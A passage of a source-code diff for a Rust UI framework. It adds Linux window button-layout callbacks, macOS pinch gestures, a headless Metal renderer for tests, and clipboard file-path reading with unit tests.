this: &mut Self,
@@ -50,8 +50,10 @@ pub(crate) struct Callbacks {
should_close: Option<Box<dyn FnMut() -> bool>>,
close: Option<Box<dyn FnOnce()>>,
appearance_changed: Option<Box<dyn FnMut()>>,
+ button_layout_changed: Option<Box<dyn FnMut()>>,
}
+#[derive(Debug, Clone, Copy)]
struct RawWindow {
window: *mut c_void,
display: *mut c_void,
@@ -600,6 +602,7 @@ impl WaylandWindowStatePtr {
state.tiling = configure.tiling;
// Limit interactive resizes to once per vblank
if configure.resizing && state.resize_throttle {
+ state.surface_state.ack_configure(serial);
return;
} else if configure.resizing {
state.resize_throttle = true;
@@ -1036,6 +1039,14 @@ impl WaylandWindowStatePtr {
}
}
+ pub fn set_button_layout(&self) {
+ let callback = self.callbacks.borrow_mut().button_layout_changed.take();
+ if let Some(mut fun) = callback {
+ fun();
+ self.callbacks.borrow_mut().button_layout_changed = Some(fun);
+ }
+ }
+
pub fn primary_output_scale(&self) -> i32 {
self.state.borrow_mut().primary_output_scale()
}
@@ -1333,6 +1344,10 @@ impl PlatformWindow for WaylandWindow {
self.0.callbacks.borrow_mut().appearance_changed = Some(callback);
}
+ fn on_button_layout_changed(&self, callback: Box<dyn FnMut()>) {
+ self.0.callbacks.borrow_mut().button_layout_changed = Some(callback);
+ }
+
fn draw(&self, scene: &Scene) {
let mut state = self.borrow_mut();
@@ -1347,23 +1362,13 @@ impl PlatformWindow for WaylandWindow {
.display_ptr()
.cast::<std::ffi::c_void>(),
};
- let display_handle = rwh::HasDisplayHandle::display_handle(&raw_window)
- .unwrap()
- .as_raw();
- let window_handle = rwh::HasWindowHandle::window_handle(&raw_window)
- .unwrap()
- .as_raw();
-
- state
- .renderer
- .recover(display_handle, window_handle)
- .unwrap_or_else(|err| {
- panic!(
- "GPU device lost and recovery failed. \
+ state.renderer.recover(&raw_window).unwrap_or_else(|err| {
+ panic!(
+ "GPU device lost and recovery failed. \
This may happen after system suspend/resume. \
Please restart the application.\n\nError: {err}"
- )
- });
+ )
+ });
// The current scene references atlas textures that were cleared during recovery.
// Skip this frame and let the next frame rebuild the scene with fresh textures.
@@ -62,7 +62,7 @@ use gpui::{
AnyWindowHandle, Bounds, ClipboardItem, CursorStyle, DisplayId, FileDropEvent, Keystroke,
Modifiers, ModifiersChangedEvent, MouseButton, Pixels, PlatformDisplay, PlatformInput,
PlatformKeyboardLayout, PlatformWindow, Point, RequestFrameOptions, ScrollDelta, Size,
- TouchPhase, WindowParams, point, px,
+ TouchPhase, WindowButtonLayout, WindowParams, point, px,
};
use gpui_wgpu::{CompositorGpuHint, GpuContext};
@@ -472,6 +472,15 @@ impl X11Client {
window.window.set_appearance(appearance);
}
}
+ XDPEvent::ButtonLayout(layout_str) => {
+ let layout = WindowButtonLayout::parse(&layout_str)
+ .log_err()
+ .unwrap_or_else(WindowButtonLayout::linux_default);
+ client.with_common(|common| common.button_layout = layout);
+ for window in client.0.borrow_mut().windows.values_mut() {
+ window.window.set_button_layout();
+ }
+ }
XDPEvent::CursorTheme(_) | XDPEvent::CursorSize(_) => {
// noop, X11 manages this for us.
}
@@ -602,6 +611,9 @@ impl X11Client {
Ok(None) => {
break;
}
+ Err(err @ ConnectionError::IoError(..)) => {
+ return Err(EventHandlerError::from(err));
+ }
Err(err) => {
let err = handle_connection_error(err);
log::warn!("error while polling for X11 events: {err:?}");
@@ -225,6 +225,7 @@ fn find_visuals(xcb: &XCBConnection, screen_index: usize) -> VisualSet {
set
}
+#[derive(Debug, Clone, Copy)]
struct RawWindow {
connection: *mut c_void,
screen_id: usize,
@@ -249,6 +250,7 @@ pub struct Callbacks {
should_close: Option<Box<dyn FnMut() -> bool>>,
close: Option<Box<dyn FnOnce()>>,
appearance_changed: Option<Box<dyn FnMut()>>,
+ button_layout_changed: Option<Box<dyn FnMut()>>,
}
pub struct X11WindowState {
@@ -533,7 +535,7 @@ impl X11WindowState {
&& let Some(title) = titlebar.title
{
check_reply(
- || "X11 ChangeProperty8 on window title failed.",
+ || "X11 ChangeProperty8 on WM_NAME failed.",
xcb.change_property8(
xproto::PropMode::REPLACE,
x_window,
@@ -542,6 +544,16 @@ impl X11WindowState {
title.as_bytes(),
),
)?;
+ check_reply(
+ || "X11 ChangeProperty8 on _NET_WM_NAME failed.",
+ xcb.change_property8(
+ xproto::PropMode::REPLACE,
+ x_window,
+ atoms._NET_WM_NAME,
+ atoms.UTF8_STRING,
+ title.as_bytes(),
+ ),
+ )?;
}
if params.kind == WindowKind::PopUp {
@@ -1245,6 +1257,14 @@ impl X11WindowStatePtr {
self.callbacks.borrow_mut().appearance_changed = Some(fun);
}
}
+
+ pub fn set_button_layout(&self) {
+ let callback = self.callbacks.borrow_mut().button_layout_changed.take();
+ if let Some(mut fun) = callback {
+ fun();
+ self.callbacks.borrow_mut().button_layout_changed = Some(fun);
+ }
+ }
}
impl PlatformWindow for X11Window {
@@ -1591,6 +1611,10 @@ impl PlatformWindow for X11Window {
self.0.callbacks.borrow_mut().appearance_changed = Some(callback);
}
+ fn on_button_layout_changed(&self, callback: Box<dyn FnMut()>) {
+ self.0.callbacks.borrow_mut().button_layout_changed = Some(callback);
+ }
+
fn draw(&self, scene: &Scene) {
let mut inner = self.0.state.borrow_mut();
@@ -1603,23 +1627,13 @@ impl PlatformWindow for X11Window {
window_id: self.0.x_window,
visual_id: inner.visual_id,
};
- let display_handle = rwh::HasDisplayHandle::display_handle(&raw_window)
- .unwrap()
- .as_raw();
- let window_handle = rwh::HasWindowHandle::window_handle(&raw_window)
- .unwrap()
- .as_raw();
-
- inner
- .renderer
- .recover(display_handle, window_handle)
- .unwrap_or_else(|err| {
- panic!(
- "GPU device lost and recovery failed. \
+ inner.renderer.recover(&raw_window).unwrap_or_else(|err| {
+ panic!(
+ "GPU device lost and recovery failed. \
This may happen after system suspend/resume. \
Please restart the application.\n\nError: {err}"
- )
- });
+ )
+ });
// The current scene references atlas textures that were cleared during recovery.
// Skip this frame and let the next frame rebuild the scene with fresh textures.
@@ -15,6 +15,7 @@ pub enum Event {
CursorTheme(String),
#[cfg_attr(feature = "x11", allow(dead_code))]
CursorSize(u32),
+ ButtonLayout(String),
}
pub struct XDPEventSource {
@@ -51,6 +52,13 @@ impl XDPEventSource {
sender.send(Event::CursorSize(initial_size as u32))?;
}
+ if let Ok(initial_layout) = settings
+ .read::<String>("org.gnome.desktop.wm.preferences", "button-layout")
+ .await
+ {
+ sender.send(Event::ButtonLayout(initial_layout))?;
+ }
+
if let Ok(mut cursor_theme_changed) = settings
.receive_setting_changed_with_args(
"org.gnome.desktop.interface",
@@ -89,6 +97,25 @@ impl XDPEventSource {
.detach();
}
+ if let Ok(mut button_layout_changed) = settings
+ .receive_setting_changed_with_args(
+ "org.gnome.desktop.wm.preferences",
+ "button-layout",
+ )
+ .await
+ {
+ let sender = sender.clone();
+ background
+ .spawn(async move {
+ while let Some(layout) = button_layout_changed.next().await {
+ let layout = layout?;
+ sender.send(Event::ButtonLayout(layout))?;
+ }
+ anyhow::Ok(())
+ })
+ .detach();
+ }
+
let mut appearance_changed = settings.receive_color_scheme_changed().await?;
while let Some(scheme) = appearance_changed.next().await {
sender.send(Event::WindowAppearance(
@@ -1,8 +1,8 @@
use gpui::{
Capslock, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton,
MouseDownEvent, MouseExitEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent,
- NavigationDirection, Pixels, PlatformInput, PressureStage, ScrollDelta, ScrollWheelEvent,
- TouchPhase, point, px,
+ NavigationDirection, PinchEvent, Pixels, PlatformInput, PressureStage, ScrollDelta,
+ ScrollWheelEvent, TouchPhase, point, px,
};
use crate::{
@@ -234,6 +234,27 @@ pub(crate) unsafe fn platform_input_from_native(
_ => None,
}
}
+ NSEventType::NSEventTypeMagnify => window_height.map(|window_height| {
+ let phase = match native_event.phase() {
+ NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => {
+ TouchPhase::Started
+ }
+ NSEventPhase::NSEventPhaseEnded => TouchPhase::Ended,
+ _ => TouchPhase::Moved,
+ };
+
+ let magnification = native_event.magnification() as f32;
+
+ PlatformInput::Pinch(PinchEvent {
+ position: point(
+ px(native_event.locationInWindow().x as f32),
+ window_height - px(native_event.locationInWindow().y as f32),
+ ),
+ delta: magnification,
+ modifiers: read_modifiers(native_event),
+ phase,
+ })
+ }),
NSEventType::NSScrollWheel => window_height.map(|window_height| {
let phase = match native_event.phase() {
NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => {
@@ -110,10 +110,12 @@ impl InstanceBufferPool {
pub(crate) struct MetalRenderer {
device: metal::Device,
- layer: metal::MetalLayer,
+ layer: Option<metal::MetalLayer>,
is_apple_gpu: bool,
is_unified_memory: bool,
presents_with_transaction: bool,
+ /// For headless rendering, tracks whether output should be opaque
+ opaque: bool,
command_queue: CommandQueue,
paths_rasterization_pipeline_state: metal::RenderPipelineState,
path_sprites_pipeline_state: metal::RenderPipelineState,
@@ -142,26 +144,9 @@ pub struct PathRasterizationVertex {
}
impl MetalRenderer {
+ /// Creates a new MetalRenderer with a CAMetalLayer for window-based rendering.
pub fn new(instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>, transparent: bool) -> Self {
- // Prefer low‐power integrated GPUs on Intel Mac. On Apple
- // Silicon, there is only ever one GPU, so this is equivalent to
- // `metal::Device::system_default()`.
- let device = if let Some(d) = metal::Device::all()
- .into_iter()
- .min_by_key(|d| (d.is_removable(), !d.is_low_power()))
- {
- d
- } else {
- // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689
- // In that case, we fall back to the system default device.
- log::error!(
- "Unable to enumerate Metal devices; attempting to use system default device"
- );
- metal::Device::system_default().unwrap_or_else(|| {
- log::error!("unable to access a compatible graphics device");
- std::process::exit(1);
- })
- };
+ let device = Self::create_device();
let layer = metal::MetalLayer::new();
layer.set_device(&device);
@@ -182,6 +167,48 @@ impl MetalRenderer {
| AutoresizingMask::HEIGHT_SIZABLE
];
}
+
+ Self::new_internal(device, Some(layer), !transparent, instance_buffer_pool)
+ }
+
+ /// Creates a new headless MetalRenderer for offscreen rendering without a window.
+ ///
+ /// This renderer can render scenes to images without requiring a CAMetalLayer,
+ /// window, or AppKit. Use `render_scene_to_image()` to render scenes.
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn new_headless(instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>) -> Self {
+ let device = Self::create_device();
+ Self::new_internal(device, None, true, instance_buffer_pool)
+ }
+
+ fn create_device() -> metal::Device {
+ // Prefer low‐power integrated GPUs on Intel Mac. On Apple
+ // Silicon, there is only ever one GPU, so this is equivalent to
+ // `metal::Device::system_default()`.
+ if let Some(d) = metal::Device::all()
+ .into_iter()
+ .min_by_key(|d| (d.is_removable(), !d.is_low_power()))
+ {
+ d
+ } else {
+ // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689
+ // In that case, we fall back to the system default device.
+ log::error!(
+ "Unable to enumerate Metal devices; attempting to use system default device"
+ );
+ metal::Device::system_default().unwrap_or_else(|| {
+ log::error!("unable to access a compatible graphics device");
+ std::process::exit(1);
+ })
+ }
+ }
+
+ fn new_internal(
+ device: metal::Device,
+ layer: Option<metal::MetalLayer>,
+ opaque: bool,
+ instance_buffer_pool: Arc<Mutex<InstanceBufferPool>>,
+ ) -> Self {
#[cfg(feature = "runtime_shaders")]
let library = device
.new_library_with_source(&SHADERS_SOURCE_FILE, &metal::CompileOptions::new())
@@ -303,6 +330,7 @@ impl MetalRenderer {
presents_with_transaction: false,
is_apple_gpu,
is_unified_memory,
+ opaque,
command_queue,
paths_rasterization_pipeline_state,
path_sprites_pipeline_state,
@@ -322,12 +350,15 @@ impl MetalRenderer {
}
}
- pub fn layer(&self) -> &metal::MetalLayerRef {
- &self.layer
+ pub fn layer(&self) -> Option<&metal::MetalLayerRef> {
+ self.layer.as_ref().map(|l| l.as_ref())
}
pub fn layer_ptr(&self) -> *mut CAMetalLayer {
- self.layer.as_ptr()
+ self.layer
+ .as_ref()
+ .map(|l| l.as_ptr())
+ .unwrap_or(ptr::null_mut())
}
pub fn sprite_atlas(&self) -> &Arc<MetalAtlas> {
@@ -336,26 +367,25 @@ impl MetalRenderer {
pub fn set_presents_with_transaction(&mut self, presents_with_transaction: bool) {
self.presents_with_transaction = presents_with_transaction;
- self.layer
- .set_presents_with_transaction(presents_with_transaction);
+ if let Some(layer) = &self.layer {
+ layer.set_presents_with_transaction(presents_with_transaction);
+ }
}
pub fn update_drawable_size(&mut self, size: Size<DevicePixels>) {
- let size = NSSize {
- width: size.width.0 as f64,
- height: size.height.0 as f64,
- };
- unsafe {
- let _: () = msg_send![
- self.layer(),
- setDrawableSize: size
- ];
+ if let Some(layer) = &self.layer {
+ let ns_size = NSSize {
+ width: size.width.0 as f64,
+ height: size.height.0 as f64,
+ };
+ unsafe {
+ let _: () = msg_send![
+ layer.as_ref(),
+ setDrawableSize: ns_size
+ ];
+ }
}
- let device_pixels_size = Size {
- width: DevicePixels(size.width as i32),
- height: DevicePixels(size.height as i32),
- };
- self.update_path_intermediate_textures(device_pixels_size);
+ self.update_path_intermediate_textures(size);
}
fn update_path_intermediate_textures(&mut self, size: Size<DevicePixels>) {
@@ -396,8 +426,11 @@ impl MetalRenderer {
}
}
- pub fn update_transparency(&self, transparent: bool) {
- self.layer.set_opaque(!transparent);
+ pub fn update_transparency(&mut self, transparent: bool) {
+ self.opaque = !transparent;
+ if let Some(layer) = &self.layer {
+ layer.set_opaque(!transparent);
+ }
}
pub fn destroy(&self) {
@@ -405,7 +438,15 @@ impl MetalRenderer {
}
pub fn draw(&mut self, scene: &Scene) {
- let layer = self.layer.clone();
+ let layer = match &self.layer {
+ Some(l) => l.clone(),
+ None => {
+ log::error!(
+ "draw() called on headless renderer - use render_scene_to_image() instead"
+ );
+ return;
+ }
+ };
let viewport_size = layer.drawable_size();
let viewport_size: Size<DevicePixels> = size(
(viewport_size.width.ceil() as i32).into(),
@@ -476,9 +517,15 @@ impl MetalRenderer {
/// Renders the scene to a texture and returns the pixel data as an RGBA image.
/// This does not present the frame to screen - useful for visual testing
/// where we want to capture what would be rendered without displaying it.
+ ///
+ /// Note: This requires a layer-backed renderer. For headless rendering,
+ /// use `render_scene_to_image()` instead.
#[cfg(any(test, feature = "test-support"))]
pub fn render_to_image(&mut self, scene: &Scene) -> Result<RgbaImage> {
- let layer = self.layer.clone();
+ let layer = self
+ .layer
+ .clone()
+ .ok_or_else(|| anyhow::anyhow!("render_to_image requires a layer-backed renderer"))?;
let viewport_size = layer.drawable_size();
let viewport_size: Size<DevicePixels> = size(
(viewport_size.width.ceil() as i32).into(),
@@ -567,21 +614,146 @@ impl MetalRenderer {
}
}
+ /// Renders a scene to an image without requiring a window or CAMetalLayer.
+ ///
+ /// This is the primary method for headless rendering. It creates an offscreen
+ /// texture, renders the scene to it, and returns the pixel data as an RGBA image.
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> Result<RgbaImage> {
+ if size.width.0 <= 0 || size.height.0 <= 0 {
+ anyhow::bail!("Invalid size for render_scene_to_image: {:?}", size);
+ }
+
+ // Update path intermediate textures for this size
+ self.update_path_intermediate_textures(size);
+
+ // Create an offscreen texture as render target
+ let texture_descriptor = metal::TextureDescriptor::new();
+ texture_descriptor.set_width(size.width.0 as u64);
+ texture_descriptor.set_height(size.height.0 as u64);
+ texture_descriptor.set_pixel_format(MTLPixelFormat::BGRA8Unorm);
+ texture_descriptor
+ .set_usage(metal::MTLTextureUsage::RenderTarget | metal::MTLTextureUsage::ShaderRead);
+ texture_descriptor.set_storage_mode(metal::MTLStorageMode::Managed);
+ let target_texture = self.device.new_texture(&texture_descriptor);
+
+ loop {
+ let mut instance_buffer = self
+ .instance_buffer_pool
+ .lock()
+ .acquire(&self.device, self.is_unified_memory);
+
+ let command_buffer =
+ self.draw_primitives_to_texture(scene, &mut instance_buffer, &target_texture, size);
+
+ match command_buffer {
+ Ok(command_buffer) => {
+ let instance_buffer_pool = self.instance_buffer_pool.clone();
+ let instance_buffer = Cell::new(Some(instance_buffer));
+ let block = ConcreteBlock::new(move |_| {
+ if let Some(instance_buffer) = instance_buffer.take() {
+ instance_buffer_pool.lock().release(instance_buffer);
+ }
+ });
+ let block = block.copy();
+ command_buffer.add_completed_handler(&block);
+
+ // On discrete GPUs (non-unified memory), Managed textures
+ // require an explicit blit synchronize before the CPU can
+ // read back the rendered data. Without this, get_bytes
+ // returns stale zeros.
+ if !self.is_unified_memory {
+ let blit = command_buffer.new_blit_command_encoder();
+ blit.synchronize_resource(&target_texture);
+ blit.end_encoding();
+ }
+
+ // Commit and wait for completion
+ command_buffer.commit();
+ command_buffer.wait_until_completed();
+
+ // Read pixels from the texture
+ let width = size.width.0 as u32;
+ let height = size.height.0 as u32;
+ let bytes_per_row = width as usize * 4;
+ let buffer_size = height as usize * bytes_per_row;
+
+ let mut pixels = vec![0u8; buffer_size];
+
+ let region = metal::MTLRegion {
+ origin: metal::MTLOrigin { x: 0, y: 0, z: 0 },
+ size: metal::MTLSize {
+ width: width as u64,
+ height: height as u64,
+ depth: 1,
+ },
+ };
+
+ target_texture.get_bytes(
+ pixels.as_mut_ptr() as *mut std::ffi::c_void,
+ bytes_per_row as u64,
+ region,
+ 0,
+ );
+
+ // Convert BGRA to RGBA (swap B and R channels)
+ for chunk in pixels.chunks_exact_mut(4) {
+ chunk.swap(0, 2);
+ }
+
+ return RgbaImage::from_raw(width, height, pixels).ok_or_else(|| {
+ anyhow::anyhow!("Failed to create RgbaImage from pixel data")
+ });
+ }
+ Err(err) => {
+ log::error!(
+ "failed to render: {}. retrying with larger instance buffer size",
+ err
+ );
+ let mut instance_buffer_pool = self.instance_buffer_pool.lock();
+ let buffer_size = instance_buffer_pool.buffer_size;
+ if buffer_size >= 256 * 1024 * 1024 {
+ anyhow::bail!("instance buffer size grew too large: {}", buffer_size);
+ }
+ instance_buffer_pool.reset(buffer_size * 2);
+ log::info!(
+ "increased instance buffer size to {}",
+ instance_buffer_pool.buffer_size
+ );
+ }
+ }
+ }
+ }
+
fn draw_primitives(
&mut self,
scene: &Scene,
instance_buffer: &mut InstanceBuffer,
drawable: &metal::MetalDrawableRef,
viewport_size: Size<DevicePixels>,
+ ) -> Result<metal::CommandBuffer> {
+ self.draw_primitives_to_texture(scene, instance_buffer, drawable.texture(), viewport_size)
+ }
+
+ fn draw_primitives_to_texture(
+ &mut self,
+ scene: &Scene,
+ instance_buffer: &mut InstanceBuffer,
+ texture: &metal::TextureRef,
+ viewport_size: Size<DevicePixels>,
) -> Result<metal::CommandBuffer> {
let command_queue = self.command_queue.clone();
let command_buffer = command_queue.new_command_buffer();
- let alpha = if self.layer.is_opaque() { 1. } else { 0. };
+ let alpha = if self.opaque { 1. } else { 0. };
let mut instance_offset = 0;
- let mut command_encoder = new_command_encoder(
+ let mut command_encoder = new_command_encoder_for_texture(
command_buffer,
- drawable,
+ texture,
viewport_size,
|color_attachment| {
color_attachment.set_load_action(metal::MTLLoadAction::Clear);
@@ -617,9 +789,9 @@ impl MetalRenderer {
command_buffer,
);
- command_encoder = new_command_encoder(
+ command_encoder = new_command_encoder_for_texture(
command_buffer,
- drawable,
+ texture,
viewport_size,
|color_attachment| {
color_attachment.set_load_action(metal::MTLLoadAction::Load);
@@ -1309,9 +1481,9 @@ impl MetalRenderer {
}
}
-fn new_command_encoder<'a>(
+fn new_command_encoder_for_texture<'a>(
command_buffer: &'a metal::CommandBufferRef,
- drawable: &'a metal::MetalDrawableRef,
+ texture: &'a metal::TextureRef,
viewport_size: Size<DevicePixels>,
configure_color_attachment: impl Fn(&RenderPassColorAttachmentDescriptorRef),
) -> &'a metal::RenderCommandEncoderRef {
@@ -1320,7 +1492,7 @@ fn new_command_encoder<'a>(
.color_attachments()
.object_at(0)
.unwrap();
- color_attachment.set_texture(Some(drawable.texture()));
+ color_attachment.set_texture(Some(texture));
color_attachment.set_store_action(metal::MTLStoreAction::Store);
configure_color_attachment(color_attachment);
@@ -1506,3 +1678,32 @@ pub struct SurfaceBounds {
pub bounds: Bounds<ScaledPixels>,
pub content_mask: ContentMask<ScaledPixels>,
}
+
+#[cfg(any(test, feature = "test-support"))]
+pub struct MetalHeadlessRenderer {
+ renderer: MetalRenderer,
+}
+
+#[cfg(any(test, feature = "test-support"))]
+impl MetalHeadlessRenderer {
+ pub fn new() -> Self {
+ let instance_buffer_pool = Arc::new(Mutex::new(InstanceBufferPool::default()));
+ let renderer = MetalRenderer::new_headless(instance_buffer_pool);
+ Self { renderer }
+ }
+}
+
+#[cfg(any(test, feature = "test-support"))]
+impl gpui::PlatformHeadlessRenderer for MetalHeadlessRenderer {
+ fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> anyhow::Result<image::RgbaImage> {
+ self.renderer.render_scene_to_image(scene, size)
+ }
+
+ fn sprite_atlas(&self) -> Arc<dyn gpui::PlatformAtlas> {
+ self.renderer.sprite_atlas().clone()
+ }
+}
@@ -1,16 +1,23 @@
use core::slice;
-use std::ffi::c_void;
+use std::ffi::{CStr, c_void};
+use std::path::PathBuf;
use cocoa::{
- appkit::{NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, NSPasteboardTypeTIFF},
+ appkit::{
+ NSFilenamesPboardType, NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString,
+ NSPasteboardTypeTIFF,
+ },
base::{id, nil},
- foundation::NSData,
+ foundation::{NSArray, NSData, NSFastEnumeration, NSString},
};
use objc::{msg_send, runtime::Object, sel, sel_impl};
+use smallvec::SmallVec;
use strum::IntoEnumIterator as _;
use crate::ns_string;
-use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, Image, ImageFormat, hash};
+use gpui::{
+ ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash,
+};
pub struct Pasteboard {
inner: id,
@@ -41,28 +48,37 @@ impl Pasteboard {
}
pub fn read(&self) -> Option<ClipboardItem> {
- // First, see if it's a string.
unsafe {
- let pasteboard_types: id = self.inner.types();
- let string_type: id = ns_string("public.utf8-plain-text");
+ // Check for file paths first
+ let filenames = NSPasteboard::propertyListForType(self.inner, NSFilenamesPboardType);
+ if filenames != nil && NSArray::count(filenames) > 0 {
+ let mut paths = SmallVec::new();
+ for file in filenames.iter() {
+ let f = NSString::UTF8String(file);
+ let path = CStr::from_ptr(f).to_string_lossy().into_owned();
+ paths.push(PathBuf::from(path));
+ }
+ if !paths.is_empty() {
+ let mut entries = vec![ClipboardEntry::ExternalPaths(ExternalPaths(paths))];
+
+ // Also include the string representation so text editors can
+ // paste the path as text.
+ if let Some(string_item) = self.read_string_from_pasteboard() {
+ entries.push(string_item);
+ }
- if msg_send![pasteboard_types, containsObject: string_type] {
- let data = self.inner.dataForType(string_type);
- if data == nil {
- return None;
- } else if data.bytes().is_null() {
- // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc
- // "If the length of the NSData object is 0, this property returns nil."
- return Some(self.read_string(&[]));
- } else {
- let bytes =
- slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize);
-
- return Some(self.read_string(bytes));
+ return Some(ClipboardItem { entries });
}
}
- // If it wasn't a string, try the various supported image types.
+ // Next, check for a plain string.
+ if let Some(string_entry) = self.read_string_from_pasteboard() {
+ return Some(ClipboardItem {
+ entries: vec![string_entry],
+ });
+ }
+
+ // Finally, try the various supported image types.
for format in ImageFormat::iter() {
if let Some(item) = self.read_image(format) {
return Some(item);
@@ -70,7 +86,6 @@ impl Pasteboard {
}
}
- // If it wasn't a string or a supported image type, give up.
None
}
@@ -94,8 +109,26 @@ impl Pasteboard {
}
}
- fn read_string(&self, text_bytes: &[u8]) -> ClipboardItem {
+ unsafe fn read_string_from_pasteboard(&self) -> Option<ClipboardEntry> {
unsafe {
+ let pasteboard_types: id = self.inner.types();
+ let string_type: id = ns_string("public.utf8-plain-text");
+
+ if !msg_send![pasteboard_types, containsObject: string_type] {
+ return None;
+ }
+
+ let data = self.inner.dataForType(string_type);
+ let text_bytes: &[u8] = if data == nil {
+ return None;
+ } else if data.bytes().is_null() {
+ // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc
+ // "If the length of the NSData object is 0, this property returns nil."
+ &[]
+ } else {
+ slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize)
+ };
+
let text = String::from_utf8_lossy(text_bytes).to_string();
let metadata = self
.data_for_type(self.text_hash_type)
@@ -111,9 +144,7 @@ impl Pasteboard {
}
});
- ClipboardItem {
- entries: vec![ClipboardEntry::String(ClipboardString { text, metadata })],
- }
+ Some(ClipboardEntry::String(ClipboardString { text, metadata }))
}
}
@@ -300,12 +331,44 @@ impl UTType {
#[cfg(test)]
mod tests {
- use cocoa::{appkit::NSPasteboardTypeString, foundation::NSData};
+ use cocoa::{
+ appkit::{NSFilenamesPboardType, NSPasteboard, NSPasteboardTypeString},
+ base::{id, nil},
+ foundation::{NSArray, NSData},
+ };
+ use std::ffi::c_void;
- use gpui::{ClipboardEntry, ClipboardItem, ClipboardString};
+ use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, ImageFormat};
use super::*;
+ unsafe fn simulate_external_file_copy(pasteboard: &Pasteboard, paths: &[&str]) {
+ unsafe {
+ let ns_paths: Vec<id> = paths.iter().map(|p| ns_string(p)).collect();
+ let ns_array = NSArray::arrayWithObjects(nil, &ns_paths);
+
+ let mut types = vec![NSFilenamesPboardType];
+ types.push(NSPasteboardTypeString);
+
+ let types_array = NSArray::arrayWithObjects(nil, &types);
+ pasteboard.inner.declareTypes_owner(types_array, nil);
+
+ pasteboard
+ .inner
+ .setPropertyList_forType(ns_array, NSFilenamesPboardType);
+
+ let joined = paths.join("\n");
+ let bytes = NSData::dataWithBytes_length_(
+ nil,
+ joined.as_ptr() as *const c_void,
+ joined.len() as u64,
+ );
+ pasteboard
+ .inner
+ .setData_forType(bytes, NSPasteboardTypeString);
+ }
+ }
+
#[test]
fn test_string() {
let pasteboard = Pasteboard::unique();
@@ -339,4 +402,124 @@ mod tests {
Some(ClipboardItem::new_string(text_from_other_app.to_string()))
);
}
+
+ #[test]
+ fn test_read_external_path() {
+ let pasteboard = Pasteboard::unique();
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &["/test.txt"]);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+
+ // Test both ExternalPaths and String entries exist
+ assert_eq!(item.entries.len(), 2);
+
+ // Test first entry is ExternalPaths
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(ep.paths(), &[PathBuf::from("/test.txt")]);
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+
+ // Test second entry is String
+ match &item.entries[1] {
+ ClipboardEntry::String(s) => {
+ assert_eq!(s.text(), "/test.txt");
+ }
+ other => panic!("expected String, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_external_paths_with_spaces() {
+ let pasteboard = Pasteboard::unique();
+ let paths = ["/some file with spaces.txt"];
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &paths);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(ep.paths(), &[PathBuf::from("/some file with spaces.txt")]);
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_multiple_external_paths() {
+ let pasteboard = Pasteboard::unique();
+ let paths = ["/file.txt", "/image.png"];
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &paths);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+ assert_eq!(item.entries.len(), 2);
+
+ // Test both ExternalPaths and String entries exist
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(
+ ep.paths(),
+ &[PathBuf::from("/file.txt"), PathBuf::from("/image.png"),]
+ );
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+
+ match &item.entries[1] {
+ ClipboardEntry::String(s) => {
+ assert_eq!(s.text(), "/file.txt\n/image.png");
+ assert_eq!(s.metadata, None);
+ }
+ other => panic!("expected String, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_image() {
+ let pasteboard = Pasteboard::unique();
+
+ // Smallest valid PNG: 1x1 transparent pixel
+ let png_bytes: &[u8] = &[
+ 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48,
+ 0x44, 0x52, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x06, 0x00, 0x00,
+ 0x00, 0x1F, 0x15, 0xC4, 0x89, 0x00, 0x00, 0x00, 0x0A, 0x49, 0x44, 0x41, 0x54, 0x78,
+ 0x9C, 0x62, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0xE5, 0x27, 0xDE, 0xFC, 0x00, 0x00,
+ 0x00, 0x00, 0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82,
+ ];
+
+ unsafe {
+ let ns_png_type = NSPasteboardTypePNG;
+ let types_array = NSArray::arrayWithObjects(nil, &[ns_png_type]);
+ pasteboard.inner.declareTypes_owner(types_array, nil);
+
+ let data = NSData::dataWithBytes_length_(
+ nil,
+ png_bytes.as_ptr() as *const c_void,
+ png_bytes.len() as u64,
+ );
